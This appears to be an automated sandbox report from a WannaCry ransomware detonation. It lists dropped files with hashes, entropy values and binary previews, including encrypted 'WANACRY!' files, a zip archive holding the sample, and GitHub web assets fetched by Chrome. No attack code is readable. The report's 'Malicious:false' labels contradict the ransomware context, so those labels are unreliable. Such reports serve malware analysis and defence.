                                                                                      Preview:WANACRY!........A...8Lk~..:.....Ej.#.Em.....N..VC..m."..].t#.]..4..?KQ[q4!...K.L......9......ck..............X..0..O.....*...c%.lO............'.,....^MO.R>p.t...c.....c...U.`y...^+...P_W........;....j....I>..?.m....RMGCdX.j..Q*,.!=>....g..*.<?;.U...:d|....{............s...Bc..3....yf ...^...>..E.Tr.v...Edn.;...p.d.c...G..7.Xt.w.7.._%.....[De.....m...1e...ft.],.%...1.m.Bh4..KX.....f+.JLO<.......s.I.V ]..<gb43>X...&...Q......4....F!7]...Y.lL..6qX.!.B.%."Dd.IK.cl.....?.-e@..+.g.w..........{.....}.)....A...'}&..2.(...8....wKb.:.P.j......['CI.H0s..S.a.H...~...vT.t*....*...Q.<Bu.X.-..>........*.[.....t.......]...1......c.R......K.@..2...0....c....0%.Q....h.."u...t.QG.......y...A.d.....88R(..Tv.6..e..k..)..{%P,..8Y.2R...g.C........4...a.......&Y{.Sg..H.Q.bK..TL*.....khd!a..Hj..".vX..8......C".w.6..'V.....Q>..w@P..)P8........<._......w..:...T..#.:.$.......2.k.K:.4.....".o.,...?...O.I8x.2....btD.C=]mbW/O.pVF!.u..Z.6$.$...V.....w..19..P.JI]#..cR...;.f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.857509887509244
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkBKUJhvLCkNUTnVF18UQw1LF3m2vHGHpvhy0QvolvgriY1dD2IKvtQ04SRwCENz:bknJhDCkSTnVr11F/GHztGr91dwvtd4D
                                                                                      MD5:88DD80AA46FC9E81DC1CA86E4208A40A
                                                                                      SHA1:33DC904D2D681CFF1F92C931B826AADA9C50B502
                                                                                      SHA-256:C3E4969DAB5E816C9CD3D55A842B844E10922CE9727437E967C67F5EA7708DA9
                                                                                      SHA-512:2315CD5B822D51801EB66528E246C6A1F50618D3798D9352FBDCB2A4ADEF732F6D35FFEE544DAD0CE6537B614AA6393E7113B9CB9987C35297AA4C2315B79914
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!........A...8Lk~..:.....Ej.#.Em.....N..VC..m."..].t#.]..4..?KQ[q4!...K.L......9......ck..............X..0..O.....*...c%.lO............'.,....^MO.R>p.t...c.....c...U.`y...^+...P_W........;....j....I>..?.m....RMGCdX.j..Q*,.!=>....g..*.<?;.U...:d|....{............s...Bc..3....yf ...^...>..E.Tr.v...Edn.;...p.d.c...G..7.Xt.w.7.._%.....[De.....m...1e...ft.],.%...1.m.Bh4..KX.....f+.JLO<.......s.I.V ]..<gb43>X...&...Q......4....F!7]...Y.lL..6qX.!.B.%."Dd.IK.cl.....?.-e@..+.g.w..........{.....}.)....A...'}&..2.(...8....wKb.:.P.j......['CI.H0s..S.a.H...~...vT.t*....*...Q.<Bu.X.-..>........*.[.....t.......]...1......c.R......K.@..2...0....c....0%.Q....h.."u...t.QG.......y...A.d.....88R(..Tv.6..e..k..)..{%P,..8Y.2R...g.C........4...a.......&Y{.Sg..H.Q.bK..TL*.....khd!a..Hj..".vX..8......C".w.6..'V.....Q>..w@P..)P8........<._......w..:...T..#.:.$.......2.k.K:.4.....".o.,...?...O.I8x.2....btD.C=]mbW/O.pVF!.u..Z.6$.$...V.....w..19..P.JI]#..cR...;.f.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84471783494312
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkOE15LgzaEDeGs/fglC+A/CWDVSUroY2/RMBFxqIv/W2CV8BPJay8moOzg7q:bkOEvLkaeeAeCWAL5Rsxqc/W2CVMJayr
                                                                                      MD5:98B2D043159A1DAC0C6542DF014A8A19
                                                                                      SHA1:3613A4F8BD79B52D83D13FC0F67F6DE5818956DC
                                                                                      SHA-256:41110FB4AA8D3ADD9C51D6F8926E1048A379F57E732A35A67A29C7923146F5DA
                                                                                      SHA-512:3FB6A76BE901DE0052C757CCC53E7442C6B1D78F0536BC2A191F3776FA2EA936AF45AA6DDE999F5713378F73A38D51013D9C184193432188F0EF209D9684E9A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....[..%s.w....r.9.dr...a..."_.HE..h......M.$....Z.3...,.Q"..O...5.O..F.@Y.X].Y(.`.....G...b...@.+.T..%N.(..).....3*.T4..\\F...}./...M..a..@......x...(..v....i2.L../.^......q....f...GB.....Wk.]..Ho.t$`..y...4.[s..'.F~.....h.s~..Og.\.q.a.....E.=................j]4.(0}a...* .0......i...>....p.Y.......W....kJ.~w.,..`.v.0..'....>r6`P.....`....,-..M`...Z.m..dn...?..!y.g`.N...+.E......:..2.l.3.......}..~...%.k...V..f...[.g.......8.*.;...q..0."0.]..i.Xt...U.xG....|.X....Qh3.j..Ep..v.X....J..=|F......1..?6q.4..R&!.....fyT'NE.d..t%wJ..1.:....e... ......^.N.b.*...\.<.E.k.r.....^ ."..n.....z.`s...^...S........P.G(...$.3..<J.0De.|Bg..55.@.%C.J..]..;`.UR.".......C.`..i.h...(.{~.GB[...6.......0.F..K...T........J@.....(...........(f.[r.t_v1....S..7.l...MY".K......q7.P....]..]t.>&...S.1.....q.X.....l...n.$...u....qtb..e...p.~.0..N.;....B.c......m.X...Mv.~.O%..b?..j42..N........s......pX....,...5.....p.P:.og{... %W....~......)./...v..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.84471783494312
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkOE15LgzaEDeGs/fglC+A/CWDVSUroY2/RMBFxqIv/W2CV8BPJay8moOzg7q:bkOEvLkaeeAeCWAL5Rsxqc/W2CVMJayr
                                                                                      MD5:98B2D043159A1DAC0C6542DF014A8A19
                                                                                      SHA1:3613A4F8BD79B52D83D13FC0F67F6DE5818956DC
                                                                                      SHA-256:41110FB4AA8D3ADD9C51D6F8926E1048A379F57E732A35A67A29C7923146F5DA
                                                                                      SHA-512:3FB6A76BE901DE0052C757CCC53E7442C6B1D78F0536BC2A191F3776FA2EA936AF45AA6DDE999F5713378F73A38D51013D9C184193432188F0EF209D9684E9A5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!.....[..%s.w....r.9.dr...a..."_.HE..h......M.$....Z.3...,.Q"..O...5.O..F.@Y.X].Y(.`.....G...b...@.+.T..%N.(..).....3*.T4..\\F...}./...M..a..@......x...(..v....i2.L../.^......q....f...GB.....Wk.]..Ho.t$`..y...4.[s..'.F~.....h.s~..Og.\.q.a.....E.=................j]4.(0}a...* .0......i...>....p.Y.......W....kJ.~w.,..`.v.0..'....>r6`P.....`....,-..M`...Z.m..dn...?..!y.g`.N...+.E......:..2.l.3.......}..~...%.k...V..f...[.g.......8.*.;...q..0."0.]..i.Xt...U.xG....|.X....Qh3.j..Ep..v.X....J..=|F......1..?6q.4..R&!.....fyT'NE.d..t%wJ..1.:....e... ......^.N.b.*...\.<.E.k.r.....^ ."..n.....z.`s...^...S........P.G(...$.3..<J.0De.|Bg..55.@.%C.J..]..;`.UR.".......C.`..i.h...(.{~.GB[...6.......0.F..K...T........J@.....(...........(f.[r.t_v1....S..7.l...MY".K......q7.P....]..]t.>&...S.1.....q.X.....l...n.$...u....qtb..e...p.~.0..N.;....B.c......m.X...Mv.~.O%..b?..j42..N........s......pX....,...5.....p.P:.og{... %W....~......)./...v..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):113052
                                                                                      Entropy (8bit):4.921774356265275
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:vW41D5acTyuhTNW41D5acTyuhTxW41D5acTyuhTZW41D5acTyuhTwW41D5acTyuW:Z
                                                                                      MD5:16BF89DDBA1DD57F22DB711FABE734A4
                                                                                      SHA1:957574454D6CF7418B7EC21EE68B9F6CF9121EA5
                                                                                      SHA-256:9B8C1638BD260C5FFC8F57CE371EF17210117AAE67FFCE5AFBF141FEEC1C4C53
                                                                                      SHA-512:A167E256DA9CFD581C6D23CF0E71E8DF6F863B162E9D1F8D32BAF91ADC0F89B7D75F059061AC6B643230821B6A82BCFA356BD64758A2F337E95CDCEEDAABDB09
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      URL:https://github.githubassets.com/assets/dark-a167e256da9c.css
                                                                                      Preview:[data-color-mode=light][data-light-theme=dark],[data-color-mode=light][data-light-theme=dark]::selection,[data-color-mode=dark][data-dark-theme=dark],[data-color-mode=dark][data-dark-theme=dark]::selection{--color-canvas-default-transparent: rgba(13,17,23,0);--color-page-header-bg: #0d1117;--color-marketing-icon-primary: #79c0ff;--color-marketing-icon-secondary: #1f6feb;--color-diff-blob-addition-num-text: #e6edf3;--color-diff-blob-addition-fg: #e6edf3;--color-diff-blob-addition-num-bg: rgba(63,185,80,0.3);--color-diff-blob-addition-line-bg: rgba(46,160,67,0.15);--color-diff-blob-addition-word-bg: rgba(46,160,67,0.4);--color-diff-blob-deletion-num-text: #e6edf3;--color-diff-blob-deletion-fg: #e6edf3;--color-diff-blob-deletion-num-bg: rgba(248,81,73,0.3);--color-diff-blob-deletion-line-bg: rgba(248,81,73,0.1);--color-diff-blob-deletion-word-bg: rgba(248,81,73,0.4);--color-diff-blob-hunk-num-bg: rgba(56,139,253,0.4);--color-diff-blob-expander-icon: #848d97;--color-diff-blob-selected-line
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                      Category:dropped
                                                                                      Size (bytes):3481589
                                                                                      Entropy (8bit):7.999940457163727
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:vhvb2BVmAw0p9jIVcEj5nnZNRyA30yBSRT:vhvq7Bu6EZnZN5EyBSN
                                                                                      MD5:EFE76BF09DABA2C594D2BC173D9B5CF0
                                                                                      SHA1:BA5DE52939CB809EAE10FDBB7FAC47095A9599A7
                                                                                      SHA-256:707A9F323556179571BC832E34FA592066B1D5F2CAC4A7426FE163597E3E618A
                                                                                      SHA-512:4A1DF71925CF2EB49C38F07C6A95BEA17752B025F0114C6FD81BC0841C1D1F2965B5DDA1469E454B9E8207C2E0DFD3DF0959E57166620CCFF86EEEB5CF855029
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:PK.........[.J.."@..5...5.D...ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeUT....i.Y.j.Yux.............c..|.!9....T....I..^.Z.@.$:...-.h...*.. ..x{&:....a..........D~&....^A.@N.....(.b..U.a.....f.N)./?...e(...34#.......R.......[).T....Zw.@........?..dsTT.u..PM....qy........@.C.....6..........?./#....BB.....Jq..Gp..`C(.i......m.......b1.q..p.....~...1N-....e...F.O..EWFH.@;..q....E.!!.=.dUyM_hl.[mb}...=..?.bx._.Ey..;.F>.S..G....,R.3qS.:."....QD..........C..p..G6rS.[....~m...s.-..i...O....1N..K.A.M._-|. ...7..~.H*.p..s)C....U.EA27 ......7..$._R'%....7.#....UB...sj....F..O.8.x....^n...].4..yO?..*|..Mdq..^...!zj...2.>{%.F.....?S...8..+.4..=X~.C.<.Sz...42..f........O.-.u-%B.....}~....?.i..D.........Oi.sLF.............. ?.}..I........9...I.E.Z..*(....../.....L.A..Q.%:....&.h.>q.gj......U.Fc(..+m.,.U\u0.*.......B.jNy..Z..h..@...9A}[....#............F.,...e.0.%....w.H.e.eV.7.......9.r(..4.......`..83l.Fx...]X...ll.d........K.l\.E
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9995)
                                                                                      Category:dropped
                                                                                      Size (bytes):10078
                                                                                      Entropy (8bit):5.207002913426883
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:wg7N1o/TqE1cdbT5gRmG2rDomyOoJM4upsb9W4E6EDELHx:NaqE1cdb9gRmG9aAMFpsb9PE6MELR
                                                                                      MD5:DA3C5A746FC185D90BFA4E7A400EC8F2
                                                                                      SHA1:CADC84F26EB12AB8AAE8A3646869DB5B0FDAF7AE
                                                                                      SHA-256:9E7D812135412A9157385717F9F048F719D8418A0DB016E19FE82A4AC971A271
                                                                                      SHA-512:B593B93F23F52AC1A010736E1960A352482946B5C7FDEAE585F09BCB1130C22B90DEFBF704D756791EEDA0D6BE64078098D029B0FFEB33862ACF6886F28A3E20
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_ref-selector_ts"],{82735:(e,t,i)=>{var s=i(46037),r=i(69567),n=i(76006),h=i(6570);function a(e,t,i,s){var r,n=arguments.length,h=n<3?t:null===s?s=Object.getOwnPropertyDescriptor(t,i):s;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)h=Reflect.decorate(e,t,i,s);else for(var a=e.length-1;a>=0;a--)(r=e[a])&&(h=(n<3?r(h):n>3?r(t,i,h):r(t,i))||h);return n>3&&h&&Object.defineProperty(t,i,h),h}let o=class RefSelectorElement extends HTMLElement{connectedCallback(){window.addEventListener("resize",this.windowResized),this.refType="branch"===this.getRequiredAttr("type")?s.r.Branch:s.r.Tag;let e=this.getAttribute("current-committish");this.currentCommittish=e?atob(e):null,this.input=this.hasAttribute("initial-filter")&&this.currentCommittish||"",this.defaultBranch=atob(this.getRequiredAttr("default-branch")),this.nameWithOwner=atob(this.getRequiredAttr("name-with-owner")),this.can
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (37898)
                                                                                      Category:dropped
                                                                                      Size (bytes):37950
                                                                                      Entropy (8bit):5.052956967920754
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:gfFKQgyYt9GTjrAtLsuXCDeBMdlKicmpJQBwKT:5vkjrAtLPemBwKT
                                                                                      MD5:D5108AA716B1121C639A5E863308587D
                                                                                      SHA1:55AE47F1309CFA2EF257BDA21483DC1EF11FD543
                                                                                      SHA-256:697C8E417A173AF2AE68FA6B8B3382707BD31FB107D2AD121FE8909A1498A32E
                                                                                      SHA-512:5AFB085E74BE7A11CF6FD10443B773F4E07F521A523B68D14C48F3DA62811B81174EE279B68DE099FCAA4243F3EAD7A1399C19D2A02B953A70087CB3913F4160
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(()=>{"use strict";var e={},_={};function s(o){var d=_[o];if(void 0!==d)return d.exports;var t=_[o]={id:o,loaded:!1,exports:{}};return e[o].call(t.exports,t,t.exports,s),t.loaded=!0,t.exports}s.m=e,(()=>{var e=[];s.O=(_,o,d,t)=>{if(o){t=t||0;for(var a=e.length;a>0&&e[a-1][2]>t;a--)e[a]=e[a-1];e[a]=[o,d,t];return}for(var n=1/0,a=0;a<e.length;a++){for(var[o,d,t]=e[a],r=!0,c=0;c<o.length;c++)n>=t&&Object.keys(s.O).every(e=>s.O[e](o[c]))?o.splice(c--,1):(r=!1,t<n&&(n=t));if(r){e.splice(a--,1);var m=d();void 0!==m&&(_=m)}}return _}})(),s.n=e=>{var _=e&&e.__esModule?()=>e.default:()=>e;return s.d(_,{a:_}),_},(()=>{var e,_=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__;s.t=function(o,d){if(1&d&&(o=this(o)),8&d||"object"==typeof o&&o&&(4&d&&o.__esModule||16&d&&"function"==typeof o.then))return o;var t=Object.create(null);s.r(t);var a={};e=e||[null,_({}),_([]),_(_)];for(var n=2&d&&o;"object"==typeof n&&!~e.indexOf(n);n=_(n))Object.getOwnPropertyNames(n).forEach(e=>a[e]=()=>o[e
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1616)
                                                                                      Category:dropped
                                                                                      Size (bytes):146763
                                                                                      Entropy (8bit):5.329025064816546
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:frfpoQvMBy2nzN7d3hBjSX+kb2d7EmjnkgX+mU56xtZQwBc1GzE29fVcaeDuqJcU:KuDuqJJfWAVSgE29xxspm0n1vuz3j94w
                                                                                      MD5:116545FB95AE9A9B9EC2B5EBB5DD34DC
                                                                                      SHA1:00BD0DEDF7E00AB53B67BD745B0067D6E7F3BE43
                                                                                      SHA-256:3E2BF4D4327AFD891A2A0F47ACAB7C6551B75EEA999026959FF94343F37BE219
                                                                                      SHA-512:3FB7B984264F75144161CA215E92E0BD492EC072843BDAB408A7D4857639360160741B8D9B672A165CB779EC6B56D83BF1C7CBC3FDB495627DCA61185036EB96
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......<!DOCTYPE html>.<html. lang="en". . data-color-mode="auto" data-light-theme="light" data-dark-theme="dark". data-a11y-animated-images="system" data-a11y-link-underlines="true". >..... <head>. <meta charset="utf-8">. <link rel="dns-prefetch" href="https://github.githubassets.com">. <link rel="dns-prefetch" href="https://avatars.githubusercontent.com">. <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com">. <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/">. <link rel="preconnect" href="https://github.githubassets.com" crossorigin>. <link rel="preconnect" href="https://avatars.githubusercontent.com">.. ... <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-0eace2597ca3.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a167e256da9c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" med
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (24748)
                                                                                      Category:dropped
                                                                                      Size (bytes):43632
                                                                                      Entropy (8bit):5.393846705649891
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:OkvLaoDjxMsgb9i1nwfKmYG2V/vjjj10c3jjtSYRv/nn7pdvb9xDn:Okvz4i1nwfKmYG2V/vjjj10c3FSmv/nL
                                                                                      MD5:EEA41021CB4FC01A389518E5D7B2ACDA
                                                                                      SHA1:D387A18422F476DD8518E6E7B976F74016F87EFE
                                                                                      SHA-256:86E0575D9D7C43437D33661F20DD09EADCB4A69FACB0360CC96EB0ED1A17F5D5
                                                                                      SHA-512:C6EA7AFB7179D55BF5E259BDFCFE16158DBCDF8AB64FC7B193A9105962FFD689AA996C7FB4C2B89A8FE71B1224BCD9EC2ABDD455E9883B80CFE83752489E3C2A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-558b50"],{26012:(e,t,a)=>{a.d(t,{Z:()=>g,e:()=>u});var r=a(67294),o=a(15388),i=a(42379),n=a(15173),l=a(11791),s=a(20917),c=a(7261),d=a(9996),p=a.n(d);function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e}).apply(this,arguments)}let u=20,m=o.ZP.img.attrs(e=>({height:e.size,width:e.size})).withConfig({displayName:"Avatar__StyledAvatar",componentId:"sc-2lv0r8-0"})(["display:inline-block;overflow:hidden;line-height:",";vertical-align:middle;border-radius:",";box-shadow:0 0 0 1px ",";height:var(--avatar-size);width:var(--avatar-size);",""],(0,i.U2)("lineHeights.condensedUltra"),e=>e.square?"clamp(4px, var(--avatar-size) - 24px, 6px)":"50%",(0,i.U2)("colors.avatar.border"),n.Z),g
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9479)
                                                                                      Category:dropped
                                                                                      Size (bytes):9584
                                                                                      Entropy (8bit):5.2169268771885395
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:cYtHD8XW+0RC1hKvjV53maRzR63v6R+z5tu41D+5mnDzc/tWuplJ6U:ciHD8XW9RQK7RzRIv6R+z5tD1qAklWup
                                                                                      MD5:683A7FE431BDED8FBBF7B5189A1B8209
                                                                                      SHA1:2FB527473877EA06EC6B023690CE933C216C5D07
                                                                                      SHA-256:F87C5B59B8F353C8762F2E44E1F82FEAFAB882A96A0FAD135DC6FC1555872AB3
                                                                                      SHA-512:9F960D9B217C457D467A9510DD9797C4EC9DF9A892C0A3E1746B2B87DCA8EC191DC901E983BC509BC282004967B6FD588DBFF5BF70BC7E20A5CA32BC7F1D772A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_selector-observer_dist_index_esm_js"],{36071:(e,t,r)=>{r.d(t,{N7:()=>F});var n=r(8439),o=null,i=null,s=[];function a(e,t){var r=[];function n(){var e=r;r=[],t(e)}return function(){for(var t=arguments.length,o=Array(t),i=0;i<t;i++)o[i]=arguments[i];r.push(o),1===r.length&&l(e,n)}}function l(e,t){i||(i=new MutationObserver(c)),o||(o=e.createElement("div"),i.observe(o,{attributes:!0})),s.push(t),o.setAttribute("data-twiddle",""+Date.now())}function c(){var e=s;s=[];for(var t=0;t<e.length;t++)try{e[t]()}catch(e){setTimeout(function(){throw e},0)}}var u=new WeakMap,d=new WeakMap,f=new WeakMap,h=new WeakMap;function v(e,t){for(var r=0;r<t.length;r++){var n=t[r],o=n[0],i=n[1],s=n[2];o===g?(function(e,t){if(t instanceof e.elementConstructor){var r=u.get(t);if(r||(r=[],u.set(t,r)),-1===r.indexOf(e.id)){var n=void 0;if(e.initialize&&(n=e.initialize.call(void 0,t)),n){var o=d.get(t);o||(o={},d.s
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (34095)
                                                                                      Category:dropped
                                                                                      Size (bytes):210512
                                                                                      Entropy (8bit):5.300774672108379
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:vjJAtjyIMb1Ybvnh4VM/974mtEB4Iz0ztt0lJN9h9tuT:v2muaw90mi4XT6NCT
                                                                                      MD5:A89A8F2F2BB2D88A93065721C9E47A2E
                                                                                      SHA1:CD36C9A2F3F961872DDE1419EE028A3043E505FF
                                                                                      SHA-256:746BE0909E59666A5F567B2AA72804A700C73DC6FE6403D68437A017563C2EFA
                                                                                      SHA-512:1FBFC5BE2C185BA0765855C0A373C65424E74958E31E1DF715A16E8B626EA4FEFF3B11FA9672E4EAEA5B5A0B59A2268A1ADD636AFEF130E514F7F3E44AB98F19
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["react-lib"],{87774:(e,t,n)=>{/**. * @license React. * react-dom-server-legacy.browser.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r=n(67294);function a(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var l=Object.prototype.hasOwnProperty,o=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (43826)
                                                                                      Category:dropped
                                                                                      Size (bytes):43926
                                                                                      Entropy (8bit):5.457845057656981
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:xrc6kbOXguA0Wpa8uiB9rcWmE2kI5ARfSeoAIl8cTPiPf6rYr/uQGJOEdsZPaj:biDAWmEbI5ARfSeoA88cTPiPbWOEdsZS
                                                                                      MD5:FCEABC43DB0BB92EF27D540A1EE7E4B2
                                                                                      SHA1:30F7BFF8126B9806997F0D02E643D48A72570F51
                                                                                      SHA-256:85E26B77318B35D4459B4CA040FBF698A352F99111D3184AD13DA7FFCD2E7231
                                                                                      SHA-512:7EF3071B711CF83A5BD1CD77F451A47B01496D358B8489F2D78A733C7DBB7544AD5C2BE8CAA21D7223F71279420A676812802E1B26C7BADD68FA1BFAA58F4191
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_consent-banner_dist_consent-banner_js"],{94229:e=>{window,e.exports=function(e){var o={};function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,o){if(1&o&&(e=t(e)),8&o||4&o&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&o&&"string"!=typeof e)for(var n in e)t.d(r,n,(function(o){return e[o]}).bind(null,n));return r},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,o){return O
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.875
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:H+uZYn:euZYn
                                                                                      MD5:46DF3E5E2D15256CA16616EBFDA5427F
                                                                                      SHA1:BE8F9B307E458075DA0D43585A05F1D451469182
                                                                                      SHA-256:AF3248D0B278571EFF9A22F8ED1CEB54B70D202B44FD70ECA4CA13A5771CECC3
                                                                                      SHA-512:88FBCC0A92317A0BADE7D4B72C023A16792F3728443075BF4B1767C8A55258836B54D56B24EABE36AE4EF240F796B58B8F1EA10C7E3C146BDE89882FC9ADE302
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:CgkKBw2RYZVOGgA=
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (17169)
                                                                                      Category:dropped
                                                                                      Size (bytes):17237
                                                                                      Entropy (8bit):5.340255813838333
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:EEfo6mna/WYKUi52Dft/B7IcZudmGCbX/6cXbZufCe/hkUZGLb:yn/m/B0cZcJCbX/vXbZufCe/hkMGLb
                                                                                      MD5:AB801B1BF008F810DE2C4B17A44F7CFF
                                                                                      SHA1:3CF703EF9C09F1E6B442E07E40262E62C5D273C8
                                                                                      SHA-256:1A13C4B74B9D1535C6203EA79B66281E67897BF5B6FE88087146F8DACAE8E297
                                                                                      SHA-512:EA3E1B2A33C673DF6739389210715F09F480646053491AE87CDEFEAF0991C572B6B9089AE77867D0C3259E95D2DDFD5B62C6094D9DE95D4DD7C097879C879148
                                                                                      Malicious:false
                                                                                      Reputation:low
